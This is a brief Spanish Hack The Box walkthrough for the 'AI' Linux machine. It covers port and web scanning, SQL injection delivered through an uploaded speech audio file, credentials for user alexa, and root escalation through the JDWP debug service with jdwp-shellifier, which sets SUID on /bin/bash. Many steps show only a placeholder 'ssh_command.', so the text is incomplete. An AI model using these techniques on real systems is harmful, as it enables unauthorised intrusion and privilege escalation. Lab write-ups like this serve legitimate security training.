AI

AI


HTB Linux

nmap -A -p- -oA ai 10.129.120.18 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA ai 10.129.120.18

nmap -sU -O -p- -oA ai-udp 10.129.120.18

nikto -h 10.129.120.18:80

ssh_command.

ssh_command.

whatweb http://10.129.120.18

ssh_command.

Vamos a http://10.129.120.18

ssh_command.

Agregamos la ip a /etc/hosts

ssh_command.

Creamos un archivo de mp3 y lo bajamos de ttsmp3.com

ssh_command.

ffmpeg ttsMp3.mp3 audio.wav

ssh_command.

http://10.129.120.18/api.php subimos el archivo wav en esta direccion

ssh_command.

wfuzz -c —hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.120.18/FUZZ.php

ssh_command.

Creamos un script para automatizar el proceso.

ssh_command.

Corremos el siguiente comando para que lo traduzca a sql

ssh_command.

Credenciales-> alexa:H,Sq9t6}a<)?q93_

ssh_command.

ssh alexa@10.129.120.18

ssh_command.

ps faux | grep ‘java’

cd /tmp

ssh_command.

https://github.com/IOActive/jdwp-shellifier

Copiamos lo que esta en jdwp-shellifier.py y creamos nuestro archivo en este ejemplo es exploit.py

python exploit.py -t 127.0.0.1 —cmd “chmod u+s /bin/bash”

bash -p

ssh_command.

© 2025 Cu3rv0x